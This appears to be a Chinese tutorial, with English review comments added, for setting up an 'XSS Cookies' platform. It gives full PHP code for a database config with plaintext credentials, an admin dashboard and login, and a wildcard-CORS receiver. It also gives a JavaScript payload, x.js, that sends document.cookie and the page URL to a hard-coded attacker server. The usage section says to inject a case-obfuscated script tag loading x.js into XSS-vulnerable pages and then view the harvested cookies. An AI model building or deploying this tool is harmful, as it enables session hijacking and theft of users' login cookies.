首先建立css文件夹-并改文件名为:bootstrap.min.css

Css源代码:

项目链接地址:https://github.com/truda8/xss-cookies/

第二步:建立文件夹install/内放index.php

源代码:

请前往项目链接地址下载和学习

建立php文件:config.php

源代码:

<?php
// MySQL database config.
// NOTE(review): these are plaintext literals in a file that sits beside the
// web-served scripts (and in the repository); anyone who can read it, or a
// copy of it, has the database and the dashboard credentials.
$host = "localhost";
$user = "xss";
$pass = "123456";
$dbname = "xss";

// Admin username and password, compared verbatim by login.php.
// NOTE(review): stored as plaintext rather than as a password hash.
$admin_user = "admin";
$admin_pass = "123456";

// Server-side address. Not referenced by any of the scripts shown on this
// page; x.js carries its own hard-coded copy of the receiver URL.
$server_url = "http://127.0.0.1/server.php";

// Create connection
$conn = new mysqli($host, $user, $pass, $dbname);

// Check connection
// NOTE(review): die() writes the raw mysqli error text into the HTTP response,
// which discloses connection details to whoever triggered the failure.
if ($conn->connect_error) {
  die("Connection failed: " . $conn->connect_error);
}
?>

建立index.php文件

源代码:

<?php
  // Dashboard page: lists the rows stored in the `cookies` table.
  // Loads the DB connection ($conn) from config.php, then gates the page on
  // the session flag that login.php sets.
  include("./config.php");
  session_start();
  //  Require an authenticated admin session.
  if (!isset($_SESSION["admin"]) or $_SESSION["admin"] !== true) {
    //  Not authenticated: reset the flag and bounce to the login page.
    $_SESSION["admin"] = false;
    header("Location: " . "./login.php");
    die();
  }
?>
<!DOCTYPE html>
<html lang="zh-CN">
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>Xss Cookies</title>
        <link rel="stylesheet" href="css/bootstrap.min.css">
        <style>
          td:nth-child(2) {
            max-width: 180px;
          }
          td:nth-child(3) {
            max-width: 360px;
          }
        </style>
    </head>
    <body class="bg-dark">
        <div class="container">
          <div class="card text-white bg-success text-center m-3 p-3">
            <h3 class="card-header bg-success">🍪Xss Cookies</h3>
            <div class="card-body table-responsive">
              <table class="table table-hover text-white">
                <thead>
                  <tr>
                    <th scope="col">Id</th>
                    <th scope="col-2">Url</th>
                    <th scope="col">Cookies</th>
                    <th scope="col">Client ip</th>
                    <th scope="col">Add date</th>
                  </tr>
                </thead>
                <tbody>
                  <!-- NOTE(review): Notiflix is called below, but no <script src> for it
                       appears in this file's <head> (login.php loads
                       js/notiflix-aio-2.7.0.min.js; this page does not), so these calls
                       look like they would throw in the browser - confirm. -->
                  <script>
                    Notiflix.Loading.Hourglass('Loading...');
                  </script>
                  <?php
                    // Escape a value for HTML body/attribute context. ENT_QUOTES covers
                    // both quote styles; double_encode=false leaves existing entities as-is.
                    function p($value) {
                      return htmlspecialchars($value, ENT_QUOTES, 'UTF-8', false);
                    }

                    // Static query; no request input is interpolated into it.
                    $sql = "SELECT id, target_url, cookies, client_ip, add_date FROM cookies;";
                    $result = $conn->query($sql);
                    // NOTE(review): query() returns false on failure, and false has no
                    // num_rows property - the error path is not handled here.
                    if ($result->num_rows > 0) {
                        // One table row per stored record. Every stored value originated
                        // from a remote request to server.php, so each goes through p().
                        while ($row = $result->fetch_assoc()) {
                            echo '<tr>';
                            echo '<td scope="row">' . p($row["id"]) . '</td>';
                            // Escaping prevents attribute break-out but does not constrain
                            // the URL scheme that ends up in href.
                            echo '<td><a class="link-info" href="' . p($row["target_url"]) . '" target="_blank">' . p($row["target_url"]) . '</a></td>';
                            echo '<td scope="row">' . p($row["cookies"]) . '</td>';
                            echo '<td scope="row">' . p($row["client_ip"]) . '</td>';
                            echo '<td scope="row">' . p($row["add_date"]) . '</td>';
                            echo '</tr>';
                        }
                    }
                  ?>
                  <script>
                    Notiflix.Loading.Remove();
                  </script>
                </tbody>
              </table>
            </div>
            <div class="card-footer bg-success text-gray-600">
              In the end.
            </div>
          </div>
        </div>
    </body>
</html>

建立登录php文件:/login.php

源代码:

<!DOCTYPE html>
<!-- Login page for the dashboard. The form POSTs back to this same file; the
     credential check runs inside the <script> block at the bottom, after the
     whole page has already been written to the response. -->
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login - Xss Cookies</title>
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <style>
        html,body {
            margin: 0;
            padding: 0;
            height: 100vh;
        }

        .container {
            height: 100vh;
        }

        .row {
            height: 100vh;
        }

    </style>
    <script src="js/notiflix-aio-2.7.0.min.js"></script>

</head>
<body class="bg-dark">
    <div class="container">
        <div class="row align-items-center justify-content-md-center">
            <div class="col-sm-12 col-lg-6">
                <h3 class="text-light">Xss Cookies 登录</h3>
                <!-- Plain POST form; no CSRF token is included. -->
                <form class="text-light" method="POST" action="./login.php">
                    <div class="mb-3">
                        <label for="username" class="form-label">用户名</label>
                        <input type="text" class="form-control" id="username" name="username">
                    </div>
                    <div class="mb-3">
                        <label for="password" class="form-label">密码</label>
                        <input type="password" class="form-control" id="password" name="password">
                    </div>
                    <div class="mb-3">
                        <!-- NOTE(review): this checkbox has no name attribute, so it is never
                             submitted with the form and has no effect. -->
                        <input type="checkbox" class="form-check-input" id="Check">
                        <label class="form-check-label" for="Check">记住密码</label>
                    </div>
                    <button type="submit" class="btn btn-primary">立即登录</button>
                </form>
            </div>
        </div>
    </div>
    <script>
        Notiflix.Report.Init({
            messageFontSize:'18px',
        });
        <?php
            // Credential check, run only on POST. Output began at the top of this
            // file, so session_start() here has to emit its cookie after output
            // started; whether that succeeds depends on output_buffering -
            // NOTE(review): confirm on the target PHP configuration.
            if ($_SERVER["REQUEST_METHOD"] == "POST") {
                include("./config.php");
                session_start();
                // NOTE(review): read without isset(); a POST missing either field
                // raises a PHP warning on these lines.
                $username = $_POST["username"];
                $password = $_POST["password"];
                // Verbatim comparison against the plaintext values in config.php.
                // NOTE(review): no password hash (password_verify), no constant-time
                // compare (hash_equals), no session_regenerate_id() after the
                // privilege change, and no attempt limiting.
                if ($username === $admin_user && $password === $admin_pass) {
                    $_SESSION["admin"] = true;
                    // Emit the success dialog plus a 3 s fallback redirect as JS.
                    $success = "
                    Notiflix.Report.Success('登录成功',
                        '即将跳转到管理页面...',
                        '立即跳转',
                        function(){
                            window.location.href = './index.php';
                        });
                        setTimeout(function(){
                            window.location.href = './index.php';
                        },3000);
                    ";
                    echo $success;
                } else {
                    // Emit the failure dialog as JS.
                    $error = "Notiflix.Report.Failure('登录失败',
                                '账号或密码错误!',
                                '确定');
                    ";
                    echo $error;
                }
            }
        ?>
    </script>
</body>
</html>

建立服务端php文件:server.php

源代码:

<?php
// Receiver endpoint: stores the url/cookies fields of a POST together with the
// requester's address, and always answers "1".
include('./config.php');

// Allow any origin (wildcard CORS, so the cross-site Ajax request is not blocked).
header('Access-Control-Allow-Origin:*');

// Determine the requester's IP address.
// Prefers REMOTE_ADDR (set by the web server); the X-Forwarded-For / X-Real-IP
// headers are consulted only when REMOTE_ADDR is absent. Those headers are
// supplied by the client, so on their own they are not a trustworthy source.
function get_client_ip() {
    $ip = null;
    if (isset($_SERVER["REMOTE_ADDR"])) {
        $ip = $_SERVER["REMOTE_ADDR"];
    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        // First entry of the comma-separated list.
        $ip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $ip = trim(current($ip));
    } else if (isset($_SERVER["HTTP_X_REAL_IP"])) {
        $ip = $_SERVER["HTTP_X_REAL_IP"];
    }
    return $ip;
}

// Get client data
// NOTE(review): read without isset(); a request missing either field raises a
// PHP warning here.
$url = $_POST['url'];
$cookies = $_POST['cookies'];
$client_ip = get_client_ip();

// Save data
// Truthiness check: an empty string (or the string "0") skips the insert.
if ($url && $cookies && $client_ip) {
    // Prepared statement: values are bound, not interpolated into the SQL.
    // No length limit is applied here; what happens to oversized values depends
    // on the column definitions, which are not shown on this page.
    $add_client = $conn->prepare("INSERT INTO cookies (target_url, cookies, client_ip) VALUES (?, ?, ?)");
    $add_client->bind_param("sss", $url, $cookies, $client_ip);

    // NOTE(review): the return value of execute() is not checked; a failed
    // insert still gets the "1" response below.
    $add_client->execute();
    $add_client->close();
}

echo 1;
$conn->close();

建立cookie js 获取文件:x.js

源代码:

// Collects the cookies the current document exposes to script and POSTs them,
// together with the page URL, to the address below.
// Cookies carrying the HttpOnly flag never appear in document.cookie, so that
// flag (plus a CSP that blocks the injected script source) is the mitigation
// against this kind of theft.
let allCookies = document.cookie;
// Hard-coded receiver address; config.php's $server_url is not consulted here.
let sererUrl = "http://192.168.3.60/server.php";
let currentUrl = window.location.href;

// POST the (already URL-encoded) globals as a form body.
// From the defender's side the observable artifact is a cross-origin
// application/x-www-form-urlencoded POST carrying `cookies=` and `url=` fields.
function sendCookie() {
    const xhttp = new XMLHttpRequest();
    xhttp.open("POST", sererUrl, true);
    xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    let data = "cookies=" + allCookies + "&url=" + currentUrl;
    xhttp.send(data);
}

// Only fires when there is at least one script-readable cookie.
if (allCookies && currentUrl) {
    // Url encode both values before sendCookie() reads them.
    allCookies = encodeURIComponent(allCookies);
    currentUrl = encodeURIComponent(currentUrl);
    sendCookie();
}

食用方法和安装:
修改配置文件 config.php 修改以下信息
MySQL 数据库信息
管理员账号密码
服务端地址

  1. 当前目录所有文件部署到 php web server
  2. 打开 http://域名/install/ 进行安装
    二、使用
  3. 将如下代码植入怀疑出现 xss 的地方
    <sCRiPt sRC=http://域名/x.js></sCrIpT>
  4. 打开 http://域名/ 登录查看 cookies 信息
    点我进入项目链接地址